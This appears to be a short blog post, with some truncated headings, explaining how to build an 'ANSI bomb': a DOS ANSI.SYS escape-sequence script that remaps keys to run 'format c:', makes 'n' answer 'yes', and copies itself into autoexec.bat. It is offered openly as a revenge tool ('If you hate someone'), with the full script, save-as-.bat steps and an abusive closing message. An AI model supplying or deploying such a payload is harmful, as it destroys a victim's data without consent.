What is an
An ANSI bomb is not necessarily a virus, but more of a computer
How does an ANSI Bomb work?
An ANSI Bomb is scripted through a Text Document, and then saved as a Microsoft
What's The Point?
If you hate someone, this is the exploit for you. Simple, yet effective. Software companies also face these with stolen software sometimes.
What will this exploit do?
When the victim clicks on the batch, the exploit is activated. When they press any of the rerouted keys, it will prompt them with a message "Are you sure you would like to format C:/? Y/N." Now, obviously your victim will press 'nN.' But the great part about an ANSI bomb, is that though they press 'nN', the computer recognizes it as 'yY', thus wiping their hard-drive, and all their hard work.
To make an ANSI bomb, copy the following script into a text document, click 'Save As,' use the drop down menu and select 'All Files,' then save it with the file extension .bat -- And that's it! You're done!
Script :
ESC[99;"format c:";13p
ESC[66;"format c:";13p
ESC[121;121;13p
ESC[89;89;13p
ESC[110;121;13p
ESC[78;89;13p
ESC[8;format c:";13p
ESC[0;0;89;13p
ESC[3;89;13p
ESC[100;"copy key.ans c:\";13;"copy con c:\autoexec.bat";13;"type key.ans";13;26;13;"cls";13p
ESC[68;"copy key.ans c:\";13;"copy con c:\autoexec.bat";13;"type key.ans";13;26;13;"cls";13p
ESC[116;"copy key.ans c:\";13;"copy con c:\autoexec.bat";13;"type key.ans";13;26;13;"cls";13p
ESC[84;"copy key.ans c:\";13;"copy con c:\autoexec.bat";13;"type key.ans";13;26;13;"cls";13p
ESC[0;59;"Fuck You Bitch!"p
No comments:
Post a Comment